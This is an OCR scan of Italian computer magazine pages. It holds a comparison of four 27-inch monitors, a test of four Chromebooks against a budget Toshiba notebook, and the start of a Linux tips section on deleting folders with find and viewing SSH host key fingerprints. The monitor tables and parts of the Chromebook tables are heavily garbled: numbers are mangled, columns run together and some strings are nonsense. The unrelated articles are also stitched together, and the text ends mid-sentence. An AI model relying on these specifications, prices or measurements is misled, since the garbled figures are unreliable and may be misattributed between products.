piedistallo) / si (Vesa 100 x 100 mm) / 

elevato (7,94 Kg) 


molto numerosi (1 VGA, 1 DVI,1 HDMI) / 

(ingresso MHL combi, 1 DP) numerose (cuffie, 
audio In, hub USB con rispettivamente 2 

porte per USB 2.0 e USB 3.0) / 1 DP.1 
HDMI,1 VGA, 1 USB 1 cavo audio 


molto numerosi (1 VGA, 1DM, 1 HDMI) 
/ (ingresso MHL combi, 1 DP) numerose 
(cuffie,Audio In, hub USB con 2 porte per 
USB 2.0 e 2 porte per USB 3.0) 1 DVI, 1 
HDMI, 1 VGA, 1 cavo audio 


si / no / no si/ no/no 


si/si | si/si 


molto elevato: 59,78 Watt / 89,59 KWh | 
(23,06 Euro), classe efficienza energetica: C | (23,08 Euro), classe efficienza energetica: C (14,65 Euro), classe efficienza energetica: B i 


RISULTATO DEL TEST 


molto elevato: 59,78 Watt / 89,67 KWh 


{  minima(19,9 ms)/ elevata (39,1 ms) 


molto breve (7,1 ms) / breve (18,7 ms) 


in lingua inglese 


poche / un po' confusa 


poche (angolo d'inclinazione) / no / 
un pò elevato (4,96 kg) 


numerose (2 HDMI, 1 DP) / poche (cuffie) / | 
1DP.1 cavo HDMI | 

| 

| 


no / no / no 


no /si 


un po' elevato: 37,69 Watt / 56,93 KWh | 


AOC ASUS | PHILIPS YAMA 
| Q2770PQU | PB2870Q | 272P4QPJKEB PROLITE XB2779QS-S1 


445 euro 521 euro 514 euro 435 euro 


L’AOC riproduce colori leggermente falsati e | l'Asus offre una qualità d'immagine migliore | Il Philips non ha convinto per la sua qualità | Lo livama è senza dubbio un monitor molto | 
anche la nitidezza potrebbe essere migliore. | di quella dell'AOC, piazzatosi al 4° posto, ma | d'immagine e soprattutto per la fedeltà | elegante, ma basta sfiorarlo leggermente 
Molto apprezzabile invece che AOC offra uno | richiede un consumo energetico più elevato | cromatica e la luminosità, che potrebbero | per lasciare antiestetici aloni sul bordo del 
hub USB con due porte per USB 2.0 e due per | e non vanta una dotazione straordinaria. | essere migliori. In compenso, si distingue | display. Non essendo del tutto antirifiesso, 
i 3.0. Dato che l'hub è collocato lateralmente, | Il monitor è racchiuso in una comice dalla | per una ricca dotazione e per funzioni extra | innervosiscono i riflessi causati dalle luci 
gli ingressi sono facilmente raggiungibili per | linea essenziale, che nasconde i tasti per la | intelligenti. Chi, oltre ad un PC, collega anche | sul soffitto. Rispetto a tutti gli altri monitor 
pendrive USB, hard disk esterni, tastiere e | regolazione. Basterà sfiorarne uno per fare | una console di gioco, potrà visualizzare | fa segnare, però, il consumo energetico più 


| mouse. apparire sul display le varie funzioni. contemporaneamente le immagini affiancate. elevato. 
Display: PLS, 26,97 pollici, 108,91 dpi; Display: TN, 27,91 pollici, 157,84 dpi; Display: PLS, 26,97 pollici, 108,91 dpi | Display: IPS, 26,97 pollici, 108,91 dpi; 
Risoluzione: 2560 x 1440 (16:9) pixel; Risoluzione: 3840 x 2160 (16:9) pixel; Risoluzione: 2560 x 1440 (16:9) pixel; Risoluzione: 2560 x 1440 (16:9) pixel; 
Dimensioni (LxAxP): 64,1x43,1-55,6 Dimensioni (LX Ax P): 65,9 x 40,6-55,7 


Dimensioni (LxA x P): 63,8 x 42,7-57,7 Dimensioni (LxAxP): 64,7 x 43,2 


x24,9 cm x21,8.cm | x27,8 cm 


un po' bassa (81,20%) / un 30 ala (84, 60%) / 


nd "bassa (79,60%) / 


un po' bassa (79,10%) Sienna SS, TONO intreta 007%) un po' bassa (80,70%) un po' bassa (84,10%) 
molto bassa (64,70%) / elevata (18,60%) / | molto bassa (80,80%) / elevata (19,10%) / | | molto bassa (62,00%) / elevata (18,30%) / | | molto bassa (60,00%) / un po' elevata 
molto naturale (6518 Kelvin) naturale (6987 Kelvin) molto naturale (6456 Kelvin) (15,30%) / molto naturale (5411 Kelvin) 
un po' bassa (279,80 cd/m2) / elevato un po' scarsa (243,10 cd/m2) / elevato un po' scarsa (287,60 cd/m2) / elevato molto elevato (408,20 cd/m2) / basso 
(0,400 cd/m2) / un po' basso (924:1) (0,300 cd/m2) / un po' basso (851:1) (0,400 cd/m2) /elevato (1065:1) (1100 cd/m2) / elevato (1082:1) 
| ampia (68,50 cm) / ampia (59,70x33,60 | | ampia (70,90 cm) / ampia (62,10x 34,10 ampia (68,50 cm) / ampia (59,70x.33,50 | ampia (68,50 cm) / ampia (59,70 x 33,60 
cm) / elevata (108,91 dpi) ! cm) / molto elevata (157,84 dpi) | cm) / elevata (108,91 dpi) | cm) / elevata (108,91 dpi) 
un po' elevata (21,10%) / un po' elevata (23,50%) / | un po' elevata (24,70%) / un po' elevata (23,40%) / 
| un po' elevata (33,80%) un po' elevata (45,07%) un po' elevata (36,80%) un po' elevata (46,13%) 
| bassi / elevati bassi / molto bassi | bassi / molto elevati | un po' elevati / molto elevati | 
| mene posta spl 1 tonpori elevata (colori leggermente sbiaditi) / molto elevata (sfumature leggermente falsate | molto elevata (colori leggermente sbiaditi) / 
nr sbiaditi) i non disponibile nella visione laterale) / non disponibile elevata (colori leggermente sbiaditi) 
da ap ino gr ; pi NI ; ; A ARI IE TRA 
L È 4; CINA ARA SET VEMINAV pei 
molto breve (8,8 ms) / breve (15,5 ms) id er breve (13,8 ms) / un po' (3.1 breve (10,8 ms) / breve (18,4 ms) 
| un po' elevata (23,0 ms) / 
MEANA One / pre giaro nia (1.0 ms) un ola (31.2 9) | on po let (23 1) / int (35 1) molto elevata (57,7 ms) 


3% Vi i 1à4 RG RINTIt 63712 na H) MINE CASE Mavi 
non Lu solo istruzioni brevi pers istruzioni ir | solo istruzioni brevi 
| numerose / un po' complicato un po' poche / poco intuitiva molto numerose / chiara e intuitiva | numerose / un po' confusa 
| molto numerose (angolo d'inclinazione, molto numerose (angolo d’inelinazione, molto numerose (angolo d'inclinazione, i 9 
| altezza, orentazione display, rotazione altezza, orientazione display, rotazione altezza, orientazione display, rotazione e 
| | piedistallo)/si(Vesa 100x100 mm)/ | piedistalio)/si(Vesa100x100mm)/ ® piedistallo) /si(Vesa 100x100 mm)/ 


mm) / elevato (8,28 Kg) 


elevato (7,78 kg) 


molto numerosi (1 VGA, 1 DVI, 1 HDMI, 1 | meri 3 ENTIRE 
1) ame tao LS | TO pi pe (le dom) | to OP LIS bce | ae cale dol) DAI 
3,0)/ 101 coovGA (EDRIHOMII cao aula: — — | cavo audio ©” ROME E iano 
Ì I | 
si/no/no | si/no/no 


si/si/sì si / no / no | 
| no /no 
cs 097) I DINA 


Di i 
un po sli: 3024 Vat:/ 53.8 KM osa OE ARI molto elevato: 63,05 Watt / 95,21 KWh 


pio ‘| (21,33 Euro), classe di efficienza energetica C | Euro), classe di efficienza energetica B__|(24,51 Euro), classe di efficienza energetica C 


° 
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| SARAI i i sala 


I notebook 


secondo Google 


Piccoli, leggeri e ideali da portare sempre in giro: questi sono 
i Chromebook, i notebook del futuro powered by Google. Ma quanto 


SAMSUNG “® 
11,6 POLLICI 30 
329 EURO. *° 


ualche anno fa, quando Google presentò i primi di- 

spositivi equipaggiati con il proprio sistema ope- 

rativo Chrome OS, l'andamento delle vendite non 
fu esaltante. Oggi, invece i Chromebook possono vantare 
decisamente un ottimo successo. Ad esempio, nello scor- 
so anno in USA, ogni dieci computer venduti, uno di questi 
era uno dei piccoli dispositivi realizzati da Google. Anche in 
Italia ora si registra l'ingresso sul mercato di questi dispo- 
sitivi economici, ragione per cui abbiamo deciso di testare 
quattro modelli attuali. Oltre ai test tradizionali, i Chrome- 
book hanno dovuto superare approfondite verifiche prati- 
che e sono stati messi a confronto con un notebook econo- 
mico, un tradizionale Toshiba della serie C55D-A. 


sono valide le soluzioni presenti già sul mercato? 


TOSHIBA 
13,4 POLLICI ; 
299 EURO. / 


Z <@P 
ACER 

i 11,6 POLLICI 

— 249EURO 


“HP 
| 14,1 POLLICI 
* 319EURO 


L’ACCOUNT GOOGLE È NECESSARIO! 


Gli utenti di una qualsiasi distro GNU/Linux (e in un cer- 
to senso anche quelli di Windows) hanno la possibilità di 
rimanere anonimi nei confronti degli sviluppatori della di- 
stro, mentre con Google tutto ciò non è possibile. AI mo- 
mento dell'accensione, i possessori di Chromebook ven- 
gono invitati a eseguire un login tramite l'account Google 
o, in alternativa, parte la registrazione guidata di un nuovo 
profilo: chi ancora non possiede un Google account, potrà 
aprirne uno immediatamente, a condizione che il disposi- 
tivo sia connesso ad Internet. L'accesso senza account 
può avvenire solo in qualità di utente ospite: in questo 
caso sarà possibile navigare sul Web senza problemi, ma 
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non potranno essere installate nuove applicazioni. Pra- 
ticamente, il Chromebook non avrà più senso di essere 
considerato tale. 


UNO STORE RICCO DI APP 


Parecchie App Google sono già preinstallate, tra queste 
Google Maps e Google Docs, che offre tutte le funzio- 
ni per la gestione di testi e tabelle, consentendo anche 
la protezione dei dati on-line. Altre app possono essere 
scaricate attraverso il Chrome Web Store, che ricorda 
vagamente il Google Play Store disponibile per smartpho- 
ne e tablet equipaggiati con Android. Il Chrome Web Sto- 
re include numerose app decisamente popolari anche su 
piattaforma mobile, come Angry Birds, Evernote e Pi- 
casa. Nel complesso, tuttavia, l'assortimento di app per 
Chrome OS è più limitato rispetto ad Android. Chi utilizza 
il browser Chrome di Google su un PC, potrà comunque 
fruire di queste app, purché esegua l'accesso con lo stes- 
so account Google. 


UN UNICO BROWSER 
PER FARE TUTTO 


Il browser di Google è il “cuore” del Chromebook. La sua 
interfaccia ricorda molto l'aspetto di Chrome su PC e 
l'utente del Chromebook potrà avviare la maggior parte 
delle app attraverso le tab del browser. Alcune app come 
Dropbox, Evernote e Picasa vengono addirittura utilizza- 
te solo come segnalibri per i relativi servizi Internet. Solo 
pochi programmi, come la calcolatrice o il file manager, 
girano in una finestra specifica. Tutto questo rende un po’ 
confusa la piattaforma di utilizzo, poiché, in un attimo, la 
finestra del browser viene a riempirsi di tabs. Abbastan- 
za fastidioso che, senza l'impiego di Internet, la maggior 
parte delle app non offra tutte le funzioni o non si avvii af- 
fatto. Ma è anche vero che il mondo dell'informatica ruota 
sempre più sulla Rete e senza una connessione al Web 
molte delle nostre attività non potrebbero essere svolte. 
Tutto ciò è comprensibile quando si tratta di social net- 
work come Google+, ma è inspiegabile come tutto questo 


Chrome ie Store —vameeisignata» - ©) 
= 


Per desktop 


ADE fantastiche utilizzabili offline e ai ci fuori cet Broaser 


Socale e comunicazione 
[Euiatizaera isa AI 


L'App Store per Chrome OS ricorda quello per smartphone e tablet Android. 
La scelta di App per Chromebook è però notevolmente più limitata. 


ee00 
cosce 
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avvenga anche con una app come “Primi Passi”, che deve 
istruire l'utente sull'utilizzo di Chrome OS o sull’elabora- 
zione delle tabelle con Google. 


BUONA VELOCITÀ DI LAVORO 


Finora la maggior parte dei Chromebook erano nettamen- 
te più lenti rispetto ai notebook. Infatti, i Chromebook era- 
no equipaggiati con processori meno efficienti, che trova- 
no impiego anche su smartphone e tablet, dove la velocità 
è meno importante rispetto alla riduzione del consumo 
energetico. La situazione è cambiata e sui Chromebook 
di Acer, HP e Toshiba viene ora installato un performante 
processore per PC della serie Haswell di Intel. Nel corso 
dei test effettuati su varie operazioni, si è rivelato vera- 
mente veloce, distanziando non solo il processore Exy- 
nos del Chromebook di Samsung, ma anche il processore 
AMD del notebook di Toshiba. 


LO STORAGE SI FA SULLA NUVOLA 


Tutti i Chromebook testati sono equipaggiati con un velo- 
ce SSD da 16 GB. Per conservare raccolte di foto e film 
si rivela però insufficiente, ma, per contro, un SSD più ca- 
piente richiederebbe un prezzo più elevato. Google, inol- 
tre, vuole indirizzare l'utente verso il servizio di storage 
on-line Google Drive. Chi acquista un Chromebook riceve 
gratis per 24 mesi un servizio di Cloud di 100 GB, attra- 
verso il quale è possibile lavorare direttamente sui file. Chi 
necessita di maggior spazio, può fortunatamente ricorre- 
re a soluzioni diverse, utilizzando altri servizi Cloud come 
Dropbox oppure impiegare hard disk esterni USB. | Chro- 
mebook possono interagire con vari file system per hard 
disk e sono in grado di leggere e scrivere dischi formattati 
per PC Windows e di leggere anche quelli per Mac. 


LEGGERI E CON LUNGA AUTONOMIA 


Indipendentemente dalla soluzione scelta per il salvatag- 
gio dei propri dati, nessuno in mobilità ama dover tra- 
sportare al seguito un dispositivo pesante. Il Samsung e 
l’Acer, con poco più di un chilo, pesano solo la metà dei 
notebook tradizionali da 15 pollici: ottimo! Lo schermo da 
11,6 pollici si presenta però nettamente più piccolo, come 
pure la tastiera, 

La risoluzione dello schermo (1366 x 768 pixel) offre im- 
magini abbastanza nitide, ma i caratteri di scrittura appa- 
iono minuscoli. | modelli di HP e Toshiba offrono display 
più ampi, ma anche il peso del dispositivo aumenta. Si 
rivelano comunque senz'altro più maneggevoli e leggeri 
di un notebook tradizionale. 

Nel corso del test, i Chromebook utilizzati con alimen- 
tazione a batteria hanno offerto una lunga autonomia: il 
Samsung di ben quattro ore e mezza e il modello di Acer, 
utilizzato per lavoro, addirittura di cinque ore e di sei per 
la visione di video. 


COSA FAI AL PC? 


| Chromebook si dimostrano 
ottimi da usare in mobilità, ma 
cosa consentono di fare? | di- 
spositivi si rivelano idonei da 
portate sempre con sé? Il test 
di utilizzo ha consentito di met- 
tere in luce tutte le potenzialità. 


Mobilità limitata: con i Chro- 
mebook testati è stato possi- 
bile accedere alla rete solo at- 
traverso connessione WLAN. 
A differenza degli smartphone, 
questi dispositivi non offrono 
la connessione UMTS. Un vero 
peccato, tenuto conto delle nu- 
merose app funzionanti solo via 
Internet. 


Testi e tabelle: non esiste una 
suite completa per lavori d’uf- 
ficio, soltanto le App Google 
Docs e Google Tables sono in 
grado di offrire numerose fun- 
zioni di elaborazione anche per 
file con formato proprietario 
(.doc, .xls, ecc). 


E-Mail: attraverso il browser è 
possibile scrivere, inviare e ri- 
cevere mail, così come avviene 
con un PC. Per le e-mail, chi 
preferisce utilizzare l’app dedi- 
cata, potrà avere accesso an- 
che off-line al proprio account 
di Gmail e alle e-mail già rice- 
vute. |l dispositivo provvederà 
all’invio delle nuove mail solo 
quando sarà connesso alla rete. 


Trasferire foto: collegando una 
fotocamera al Chromebook via 
USB, si avvia automaticamen- 
te l’app “Google+Foto”, per 
trasferire le immagini all’ac- 
count Google+ dell’utente. Nel 
corso del test, i Chromebo- 
ok non sempre hanno ricono- 
sciuto le fotocamere collegate. 
Si rivelerà più semplice inseri- 
re la scheda di memoria in un 
lettore e passare le foto sul 
Chromebook attraverso il file 
manager Files o copiarle su un 
servizio Cloud. 


Ascoltare musica: tutti i can- 
didati al test hanno riprodotto 
senza alcun problema, anche 
da un servizio Cloud, brani mu- 
sicali in formato MP3 o M4A. 
Chrome OS consente l'ascolto 
di servizi streaming di musica 
solo attraverso il browser. 


Trasferimento di file: funzio- 
na solo tramite pendrive USB, 
hard disk esterno o servizio 
Cloud. Chi non utilizza Google 
Drive, prima di lavorare sui file 
dovrà inizialmente scaricarli dal 
servizio Cloud e successiva- 
mente ricaricarveli. 


Collegare periferiche: si rive- 
la pratico, poiché con un Chro- 
mebook non si è mai costretti 
a dover cercare i relativi driver. 
Sia che si tratti di tastiera, mou- 
se, monitor o hard disk USB, 
Chrome OS provvede a instal- 
lare automaticamente i driver, 
nel momento in cui la periferica 
viene collegata. Chi collega una 
stampante riceverà una brut- 
ta sorpresa, dato che Chrome 
OS riconosce sì il dispositivo, 
ma non lo installa. Il processo 
di stampa funziona solo se la 
stampante utilizza la tecnologia 
Google Cloud Print oppure se è 
collegata a un PC corredato di 
browser Chrome. 


CONCLUSIONI 


| nuovi Chromebook stanno 
lentamente diventando degli 
autentici concorrenti per i no- 
tebook economici, anche se, 
per sfruttarli correttamente, de- 
vono sempre essere connessi 
a Internet. La mancanza di un 
accesso alla rete evidenzia no- 
tevoli limitazioni. Il piccolo Acer 
C270 (249 euro), con schermo 
da 11,6 pollici, si è aggiudica- 
to la vittoria. Sono stati battuti 
per un soffio i Chromebook di 
Toshiba (299 euro) e HP (329 
euro), che vantano uno scher- 
mo più ampio. 


NOTEBOOK VS 
CHROMEBOOK 


VELOCITA 

Il sistema operativo dei Chromebook è strettamente legato al browser 
Chrome di Google. | benchmark per il test sulla velocità si basano 

su tecnologie, come per esempio JavaScript o HTML 5 (vedi tabella), 
che trovano impiego anche su pagine Intemet e App. | risultati sono 
pertanto diversi da quelli del test sui notebook, per i quali, per la 
misurazione della velocità, si u 


Dia 
ty Moaauremant tren 


IMMAGINI, AUDIO E BATTERIA 

Per verificare la qualità video e audio dei Chromebook valgono 
gli stessi parametri rigorosi utilizzati per i notebook. Anche le 
valutazioni per la durata della batteria sono comparabili, poiché 
i tester simulano le stesse condizioni, lavorando con elaboratori 
portatili e visionando video. 


DOTAZIONE 

Oltre alle tradizionali procedure di test per i notebook Linux 
Magazine, peri Chromebook, analizza anche con quale grado 

di qualità le loro funzioni possano essere ampliate, impiegando 
anche altre App e quanto validamente possano essere utilizzate 
periferiche aggiuntive come stampanti, mouse o monitor. 
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9 MBAR BIOS 


> 


ACER TOSHIBA 
C720-29552G01AIl CHROMEBOOK CB30-102 


TEST | Ideale per la mobilità: il Chromebook di Acer Con il suo peso di quasi 1,5 Kg rimane ancora 
pesa 1,2 Kg e, grazie a un buon vetro antiriflesso, | leggero e con un'autonomia di batteria analoga 


consente di visualizzare bene il contenuto dello al modello di HR nettamente più pesante. Lo 
CH ROM EBOOK schermo, anche sotto la luce del sole. Con uso 


schermo da 13,4 pollici presenta però dei punti 
normale, la batteria offre un'autonomia di cinque | deboli: le scritte e i simboli si leggono bene, ma i 
ore e addirittura di sei nella visione di video. colori appaiono un po' falsati. 
PREZZO 249 euro 299 euro 


| Processore: Intel Celeron 2955U, 1,4 GHz; Scheda grafica: Processore: Intel Celeron 2955U, 1,4 Ghz; Scheda grafica: 
INFO. Intel HD Graphics; Display: 11,6 pollici (29,5 cm), 1366x ‘Intel HD Graphics; Display: 13,4 pollici (34 cm) 1366x 768. 
| —768 Pixel; Memoria: 2 GB, DDR3; Unità: 16 GB SSD Pixel; Memoria: 2 GB, DDR3; Unità: 16 GB SSD 


| Il piùveloce tra quelli testati; Schermo nitido e antiriflesso; 
Leggero; Lunga autonomia; Touchpad preciso 
Dotazione povera: Poco espandibile 


Molto veloce; Ottima autonomia 


Riproduzione colori un po' falsata; Dotazione povera 


VELOCITÀ DI LAVORO DEL CHROMEBOOK? 
Avviare App e aprire pagine Intent. con JavaScript . velocità elevata 
Avviare App e aprire pagine Intenet con HTML-5 velocitàelevata velocità elevata 
Velocità di gioco con giochi semplici da browser (fps) molto fivida (56) molto fluida (55) 


QUALITÀ IMMAGINE E AUDIO? 


Riproduzione cromatica / Contrasto / Luminosità | molto bassa / elevato / elevato molto bassa / molto elevato / elevato 
| N° Pivel per pollice (densità pixel) bassa (135,1 dpi / 1366x 768 Picel) bassa (116,9 dpi / 1366 x 768 Piuel) 
Qualità immagine (test visivo su display integrato) | elevata (colori leggermente pallidi) elevata (sfumature pelle leggermente falsate) 
Qualità immagine sull'uscita video digitale / analogica molto elevata / non presente molto elevata / non presente 
Qualità audio (dev. di frequenza / rumorosità / distorsione) | buona (0,08% / 83,59 db / 0,016%) buona (0,10% / 85,02 dB / 0,014%) 
QUALITÀ D'IMPIEGO. DEL NOTEBOOK IN MOBILITÀ? 
Autonomia batteria: lavoro / riproduzione video / durata ricarica molto lunga: 5,09 ore / 5,59 ore / 2,42 ore | molto lunga: 6,17 ore / 6,52 ore / 2,46 ore 
Aumento temperatura, dopo 2 ore, a temperatura ambiente — basso: 18,8 gradi molto basso: 15,3 gradi 
Consumo in esercizio / Spese consumo elettrico all'anno molto basso: 14,46 Watt / 5,24 Euro molto basso: 14,43 Watt / 5,36 Euro 
Peso (Dispositivo / Alimentatore con cavo) | basso (1192 grammi / 316 grammi) i basso (1463 grammi / 274 grammi) 
LA DOTAZIONE DEL DISPOSITIVO È COMPLETA? 
Memoria di lavoro integrata/ espandibile | scarsa: 2 Gigabyte (1x 2 GB) / non possibile scarsa: 2 Gigabyte (1x2 GB) / non possibile 
Disco fisso: tipo / capienza effettiva / modello | SSD / 16 GB / Kingston SNS4151 SSD / 16 GB / Liteon LSS-16L | 
WIAN / Radiofrequenza / Portata all'aperto / Bluetooth | —n(300Mbps)/2,4e5 GHz/ molto elevata / si (4,0) —‘ n(300Mbps)/2,4e5 Gigahenz/ molto elevata / si (4.0) 
Ulteriori connessioni / possibilità di espansione un po' limitate/ nessuna un po' limitate / nessuna 
Lettore schede di memoria (schede supportate) / Microfono sì (perSD / SDHC / SDXC, MMC) / si sì (per SD / SDHC / SDXC,MMC) / sì 
Programmi in dotazione un po' pochi © un po' pochi 
Completezza funzioni: espandibile si solo tramite Google Chrome Web Store) si (solo tramite Google Chrome Web Store) 
Compatibilità hardware molto limitata molto limitata 
FACILITÀ D'USO? 
Messa in servizio / Istruzioni complicata / solo istruzioni rapide complicata / solo in inglese 
Qualità Tastiera / Touchpad / a mezzo touchscreen — un pò traballante / un po' delicato / no un po' morbida / tende a cedere / no 


coso 
CALI 


co 
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Ripristino impostazione di fabbrica del Chromebook è possibile ripristinare agevolmente il sistema è possibile ripristinare agevolmente il sistema 


Processore: Intel Celeron 2955U 1,4 Ghz; Scheda grafica: Processore: ARM Exymos 5250, 1,7 Ghz: Scheda grafica: ——CPU: AMDA4-5000, 1,5 GHz; GPU: AMD Radeon HD8330; 


| 
| 
| Un po'lento; Forti riflessi; Un po' pesante; Dotazione povera | Un po' lento; Contrasto un po' povero; Dotazione povera | Più lento dei Chromebook con CPU Intel; Touchpad ruvido 


VCRIRE Deus mini 
A Y 
PESI la 


pos A 


SAMSUNG TOSHIBA 


HP 
» CHROMEBOOK 14-Q030SG — | —CHROMEBOOK XE303C12-HO1DE — SATELLITE C55D-A-14. 

Il Chromebook 14 di HP vanta il display più Il Chromebook di Samsung è equipaggiato con un | Che sorpresa! Le operazioni tradizionali eseguite 
ampio. Scritte e simboli si leggono meglio, ma la | processore ARM, impiegato anche su smartphone | con i Chromebook vengono effettuate dal note- 
qualità dell'immagine è mediocre. Con i suoi 1,8 | e tablet, ma che non ha nessuna chance contro book di Toshiba in modo più lento, rispetto ai 
Kg, il Chromebook di HP è pesante, ma la batteria | il processore per PC di Intel. Il XE303, utilizzato Chromebook con processore Intel. Il C55D ha 
offre una lunga durata. Sia per lavoro o per visio- come macchina da scrivere per la mobilità, si | altre qualità: schermo più grande con immagine 
nare video, la batteria si è esaurita dopo sei ore. rivela comunque valido. migliore e una maggiore capienza di storage. 

319 euro 329 euro 399 euro 
Î 


Intel HD Graphics; Display: 14,1 pollici (35,7 cm) 1366x —.. ARM MaliT604; Display: 11,6 pollici (29,4 cm) 1366x 768. Display: 15,6 pollici (39,5 cm), 1366 x 768 Pixel; Memoria: 
768 Pixel; Memoria: 2 GB, DDR3; Unità: 16GBSSD Pixel; Memoria: 2 GB, DDR3; Unità: 16 GB SSD _—&GB,DDR3; Unità: 500 GB HDD, masterizzatore DVD 


Lo schermo più grande e migliore del test; Silenzioso; 
Lunga autonomia; Più espandibile rispetto ai Chromebook 


Immagini nitide; Molto leggero; Lunga autonomia; 


Molto veloce nei giochi; Lunga autonomia | cip comio a ampio 


velocità molto bassa velocità bassa velocità bassa 
velocità elevata velocità bassa velocità bassa 
molto fluida (54) rimane fluida (27) fiuida (42) 
molto bassa / molto elevato / un po' basso. molto bassa / basso / un pò basso | basso / basso / un po' basso 
bassa (111,1 dpi / 1366 x 768 Pitel) | bassa (135,1 dpi / 1366 x 768 Pixel) bassa (100,5 dpi / 1366 x 768 Pixel) 
elevata (colori un po' pallidi) i elevata (contrasto un po' eccessivo) i molto elevata (colori leggermente pallidi) 
molto elevata / non presente molto elevata / non presente molto elevata / molto elevata | 
buona (0,09% / 86,28 dB / 0,015%) buona (0,10% / 90,50 dB / 0,027%) i buona (0,31% / 92,04 dB / 0,006%) | 
molto lunga: 6,28 ore / 6,33 ore / 2,51 ore | lunga: 4,38 ore / 4,57 ore / 2,34 ore lunga: (4,16 ore / 3,44 ore / 1,58 ore 
silenzioso | silenzioso molto silenzioso (0,4 / 0,4 / 0,5 / 0,5 Sone) 
basso: 17,5 gradi basso: 17,0 gradi molto basso: 15,3 gradi 
molto basso: 14,31 Watt / 5,34 Euro molto basso: 10,5 Watt / 4,18 Euro molto basso: 16,06 Watt / 6,07 Euro 
.  unpo'elevato (1828 grammi / 351 grammi) | molto basso (1124 grammi /271 grammi) Î un po' elevato (2278 grammi / 223 grammi) 
scarsa: 2 Gigabyte (1x2 GB) / non possibile } scarsa : 2 Gigabyte (1x2.GB) / non possibile molta: 6 Gigayte / 16 Gigabyte 
SSD / 16 Gigabyte / Liteon LSS-16L | SSD / 16 Gigabyte / eMMC HDD / 466 GB / Toshiba MQO01ABFO50 
n (300 Mbps) / 2,4 e 5 Gigahertz / molto elevata / si (4,0) Î n (300 Mbps) / 2,4 e 5 Gigahertz / molto elevata / si (4.0) i n (150 Mbps) / 2,4 GHz / molto elevata / si (4.0) 
un po' limitate / nessuna un po' limitate / nessuna estese / nessuna 
si(perSD / SDHC / SDXC)/ si sì (perSD/ SDHC / SDXC) / si Sì (per SD, SDHC, SDKC, MMC) / si 
un po' pochi un po' pochi pochi 
si (solo tramite Google Chrome Web Store) | si (solo tramite Google Chrome Web Store) si (tramite Windows Store e altre fonti) 
molto limitata molto limitata | utilizzabile con quasi tutti dispositivi 
complicata / solo istruzioni rapide | complicata / solo istruzioni rapide | semplice / solo istruzioni rapide 
un po’ morbida / un po traballante / no Î un po' traballante / comodo / no i traballante / un po' morbido / no 
è possibile ripristinare agevolmente il sistema è possibile ripristinare agevolmente il sistema tramite il ripristino dati di Windows 
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9 Tips & Tricks 


2 Trucchi e consigli per usare subito GNU/Linux come un esperto, trovare 
soluzioni rapide ai problemi e sfruttare appieno le potenzialità del sistema 


DATABASE 


CR uaroware 

de 

E murmeon 
: 


voi SICUREZZA 


SISTEMA 


SVILUPPO 


UFFICIO 


ELIMINIAMO LE 
CARTELLE INUTILI 


P7 Sempre più di sovente molti 

sistemi operativi o dispositivi 
specifici (Come i NAS) popolano le 
cartelle con una serie di informazioni 
aggiuntive per poter svolgere alcune 
funzioni in maniera più rapida. Ad 
esempio visualizzare delle miniature 
delle immagini oppure per conservare 
delle indicizzazioni dei file in esse con- 
tenute. Si tratta in genere di funzioni 
utili ma che in alcuni frangenti potreb- 
bero risultare indesiderate. Certo, ba- 
sterà disabilitare la relativa funzione e 
tali processi non svolgeranno più il 
loro compito, ma cosa fare delle infini- 
te cartelle che nel mentre sono state 
generate e che occupano solo del pre- 
zioso spazio? Ovviamente la soluzione 
più ovvia è quella di cancellarle assie- 
me al loro contenuto, ma poiché po- 
trebbe trattarsi di migliaia di file agire 
manualmente diventerebbe sconsi- 
gliato. Ricorrendo però al programma 
find e ad alcune sue opzioni, l’intero 
lavoro si potrà svolgere digitando un 
solo comando. Supponiamo che le 
cartelle da rimuovere si chiamino car- 
tella_con_miniature; per prima cosa 
dovremo indicare a find di cercare 
solo le cartelle (opzione -type d) e poi 
specificarne il nome, avendo cura di 
definire il comando da eseguire qualo- 
ra queste siano state trovare (tramite 
l'opzione -exec). Nel nostro caso, il 
comando sarà un semplice rm -ri (che 
provvederà ad eliminare i sotto ele- 
menti chiedendoci però una confer- 
ma) a cui passeremo ciò che è stato 
travato dal find mediante la direttiva {}. 
In alternativa, specialmente per i primi 
approcci all'utilizzo di questa tecnica, 
si potrà usare il comando echo che, in 


maniera molto più innocua, provvede- 
rà solamente a visualizzare gli elemen- 
ti trovati dandoci modo di capirne 
bene il comportamento. Il comando 
deve poi terminare con i caratteri \;. 
È sicuramente più difficile a dirsi che a 
farsi. Infatti, nel primo caso dovremo 
digitare: find -type d -name cartel- 
la_con_miniature -exec rm -ri G} \. 
Nel secondo, invece: find -type d 
-name cartella_con_miniature 
-exec echo {}\;. 

Ovviamente, prima di lanciarsi in 
un'operazione di pulizia sull'intero 
disco o comunque su dati reali è for- 
temente consigliato di fare qualche 
esperienza su delle cartelle di prova. 


LE CHIAVI SSH 


Nelle pagine di questa rubrica 
Y$ abbiamo avuto più volte occa- 
sione di parlare del server e del client 


SSH, due strumenti (indispensabili) 
che consentono connessioni sicure 
tra sistemi GNU/Linux. Una delle com- 
ponenti che contribuisce a rendere si- 
cura la comunicazione è l’univocità 
della chiave identificativa di un server. 
Una sorta di impronta digitale informa- 
tica che, accettata durante la primissi- 
ma connessione, viene verificata ad 
ogni successivo collegamento dal 
client in modo da essere certi che ci si 
stia autenticando esclusivamente con 
il sistema desiderato. Queste chiavi 
vengono generate automaticamente 
dalla distribuzione o dal pacchetto du- 
rante l'installazione della componente 
server e quindi solitamente l’utente 
normale non ha molto a che fare con la 
loro gestione. Esistono però alcuni 
casi in cui potrebbe essere necessario 
intervenire manualmente per crearne 
di nuove, come ad esempio la duplica- 


Modifiche applicate 


Modifiche applicate 


6 


Tutte le modifiche sono state applicate, E possibile chiudere la finestra, 


Chiudere automaticamente applicate le modifiche 


w Dettagli 


Il Fig. 1 è La generazione delle chiavi ssh avviene solitamente in fase di 


installazione 


zione di macchine virtuali oppure per 
identificare un nuovo server o ancora 
per forzare nuovamente la procedura 
di accettazione per una specifica 
macchina. La procedura in questi casi 
è comunque molto semplice, basta 
infatti ricorrere a ssh-keygen. Per pri- 
ma cosa potrebbe essere interessante 
visualizzare le chiavi attuali e per far 
questo è sufficiente ricorrere alla op- 
zione -If specificando l'attuale file che 
le contiene (solitamente in /etc/ssh): 
ssh-keygen -If /etc/ssh/ssh_host_ 
ecdsa_key (ovviamente il nome del 
file potrebbe essere diverso in funzio- 
ne della distribuzione). Come si può 
notare, il file dell'esempio contiene la 
parola ecdsa che indica un tipo di al- 
goritmo di cifratura della chiave ma è 
probabile che oltre a questo vi siano 
anche l'RSA e il DSA. In pratica, po- 
